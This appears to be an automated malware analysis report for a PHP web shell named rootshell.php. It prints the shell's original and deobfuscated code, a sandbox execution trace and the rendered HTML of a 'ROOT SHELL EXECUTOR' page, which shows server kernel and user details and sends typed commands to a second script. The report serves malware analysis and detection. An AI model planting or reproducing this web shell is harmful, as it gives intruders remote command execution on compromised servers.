rootshell.php

md5: 23ac8bfbc10d6d5f7d4acafacaecc9f4

Jump to:
Deobfuscated code (Read more)
Execution traces (Read more)
Generated HTML (Read more)
Original Code (Read more)
Screenshot
Attributes
Environment
php_uname (Deobfuscated, Original, Traces)

Title
ユ ウ キ (Deobfuscated, HTML, Original)

URLs
https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js (Deobfuscated, HTML, Original)

Deobfuscated PHP code
<?php

if (!function_exists('posix_getegid')) {
    $user = @get_current_user();
    $uid = @getmyuid();
    $gid = @getmygid();
    $group = "?";
} else {
    $uid = @posix_getpwuid(posix_geteuid());
    $gid = @posix_getgrgid(posix_getegid());
    $user = $uid['name'];
    $uid = $uid['uid'];
    $group = $gid['name'];
    $gid = $gid['gid'];
}
$kernel = php_uname();
?>

<!DOCTYPE html>
<html>
	<head>
		<title>ユ ウ キ</title>
		<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
	</head>
<body>
	<form method="post" action="yuuki2.php">
		<h2>ROOT SHELL EXECUTOR</h2><br>
		<?php 
echo "SYSTEM: {$kernel}<br>";
?>
		<?php 
echo "UID/GID: {$user} ( {$uid} ) | {$group} ( {$gid} )<br><br>";
?>
		<input type='text' name="yuuki" id='yuuki'></input>
		<button id="btn" type="submit">Kirim</button>
	</form>
	<script type="text/javascript">
		$(function(){
			$("form").submit(function(){
				$.ajax({
					url:$(this).attr("action"),
					data:$(this).serialize(),
					type:$(this).attr("method"),
					dataType: 'html',
					beforeSend: function() {
						$("input").attr("disabled",true);
						$("button").attr("disabled",true);
					},
					complete:function() {
						$("input").attr("disabled",false);
						$("button").attr("disabled",false);								
					},
					success:function(hasil) {
						var txt = $("#yuuki");
						if(txt.val().trim().length < 1) {
							alert("input cmd beforeSend");
						}else{
							$("#shellrespon").html('<pre>' + hasil + '</pre>');
							$("form")[0].reset();
							setTimeout(function(){
								$("input").focus();
							},1000);
						}
					}
				})
			return false;
			});
		});
	</script>
	<div id="shellrespon"></div>
	</body>
</html>
Execution traces
data/traces/23ac8bfbc10d6d5f7d4acafacaecc9f4_trace-1676245486.912.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 21:45:12.809811]
1	0	1	0.000166	393528
1	3	0	0.000246	400544	{main}	1		/var/www/html/uploads/rootshell.php	0	0
2	4	0	0.000264	400544	function_exists	0		/var/www/html/uploads/rootshell.php	2	1	'posix_getegid'
2	4	1	0.000280	400584
2	4	R			TRUE
2	5	0	0.000295	400544	posix_geteuid	0		/var/www/html/uploads/rootshell.php	8	0
2	5	1	0.000308	400544
2	5	R			33
2	6	0	0.000321	400544	posix_getpwuid	0		/var/www/html/uploads/rootshell.php	8	1	33
2	6	1	0.000353	401376
2	6	R			['name' => 'www-data', 'passwd' => 'x', 'uid' => 33, 'gid' => 33, 'gecos' => 'www-data', 'dir' => '/var/www', 'shell' => '/usr/sbin/nologin']
1		A						/var/www/html/uploads/rootshell.php	8	$uid = ['name' => 'www-data', 'passwd' => 'x', 'uid' => 33, 'gid' => 33, 'gecos' => 'www-data', 'dir' => '/var/www', 'shell' => '/usr/sbin/nologin']
2	7	0	0.000400	401344	posix_getegid	0		/var/www/html/uploads/rootshell.php	9	0
2	7	1	0.000413	401344
2	7	R			33
2	8	0	0.000425	401344	posix_getgrgid	0		/var/www/html/uploads/rootshell.php	9	1	33
2	8	1	0.000452	402008
2	8	R			['name' => 'www-data', 'passwd' => 'x', 'members' => [], 'gid' => 33]
1		A						/var/www/html/uploads/rootshell.php	9	$gid = ['name' => 'www-data', 'passwd' => 'x', 'members' => [], 'gid' => 33]
1		A						/var/www/html/uploads/rootshell.php	10	$user = 'www-data'
1		A						/var/www/html/uploads/rootshell.php	11	$uid = 33
1		A						/var/www/html/uploads/rootshell.php	12	$group = 'www-data'
1		A						/var/www/html/uploads/rootshell.php	13	$gid = 33
2	9	0	0.000529	400624	php_uname	0		/var/www/html/uploads/rootshell.php	16	0
2	9	1	0.000543	400736
2	9	R			'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
1		A						/var/www/html/uploads/rootshell.php	16	$kernel = 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
1	3	1	0.000582	400736
			0.000616	314592
TRACE END   [2023-02-12 21:45:12.810295]

Generated HTML code
<html><head>
		<title>ユ ウ キ</title>
		<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
	</head>
<body>
	<form method="post" action="yuuki2.php">
		<h2>ROOT SHELL EXECUTOR</h2><br>
		SYSTEM: Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64<br>		UID/GID: www-data ( 33 ) | www-data ( 33 )<br><br>		<input type="text" name="yuuki" id="yuuki">
		<button id="btn" type="submit">Kirim</button>
	</form>
	<script type="text/javascript">
		$(function(){
			$("form").submit(function(){
				$.ajax({
					url:$(this).attr("action"),
					data:$(this).serialize(),
					type:$(this).attr("method"),
					dataType: 'html',
					beforeSend: function() {
						$("input").attr("disabled",true);
						$("button").attr("disabled",true);
					},
					complete:function() {
						$("input").attr("disabled",false);
						$("button").attr("disabled",false);								
					},
					success:function(hasil) {
						var txt = $("#yuuki");
						if(txt.val().trim().length < 1) {
							alert("input cmd beforeSend");
						}else{
							$("#shellrespon").html('<pre>' + hasil + '</pre>');
							$("form")[0].reset();
							setTimeout(function(){
								$("input").focus();
							},1000);
						}
					}
				})
			return false;
			});
		});
	</script>
	<div id="shellrespon"></div>
	
</body></html>
Original PHP code
<?php
if(!function_exists('posix_getegid')) {
	$user = @get_current_user();
	$uid = @getmyuid();
	$gid = @getmygid();
	$group = "?";
} else {
	$uid = @posix_getpwuid(posix_geteuid());
	$gid = @posix_getgrgid(posix_getegid());
	$user = $uid['name'];
	$uid = $uid['uid'];
	$group = $gid['name'];
	$gid = $gid['gid'];
}

$kernel = php_uname();
?>

<!DOCTYPE html>
<html>
	<head>
		<title>ユ ウ キ</title>
		<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
	</head>
<body>
	<form method="post" action="yuuki2.php">
		<h2>ROOT SHELL EXECUTOR</h2><br>
		<?php echo("SYSTEM: $kernel<br>"); ?>
		<?php echo("UID/GID: $user ( $uid ) | $group ( $gid )<br><br>"); ?>
		<input type='text' name="yuuki" id='yuuki'></input>
		<button id="btn" type="submit">Kirim</button>
	</form>
	<script type="text/javascript">
		$(function(){
			$("form").submit(function(){
				$.ajax({
					url:$(this).attr("action"),
					data:$(this).serialize(),
					type:$(this).attr("method"),
					dataType: 'html',
					beforeSend: function() {
						$("input").attr("disabled",true);
						$("button").attr("disabled",true);
					},
					complete:function() {
						$("input").attr("disabled",false);
						$("button").attr("disabled",false);								
					},
					success:function(hasil) {
						var txt = $("#yuuki");
						if(txt.val().trim().length < 1) {
							alert("input cmd beforeSend");
						}else{
							$("#shellrespon").html('<pre>' + hasil + '</pre>');
							$("form")[0].reset();
							setTimeout(function(){
								$("input").focus();
							},1000);
						}
					}
				})
			return false;
			});
		});
	</script>
	<div id="shellrespon"></div>
	</body>
</html>
PHP Malware Analysis

rootshell.php

md5: 23ac8bfbc10d6d5f7d4acafacaecc9f4

Screenshot

Attributes

Deobfuscated PHP code

Execution traces

Generated HTML code

Original PHP code
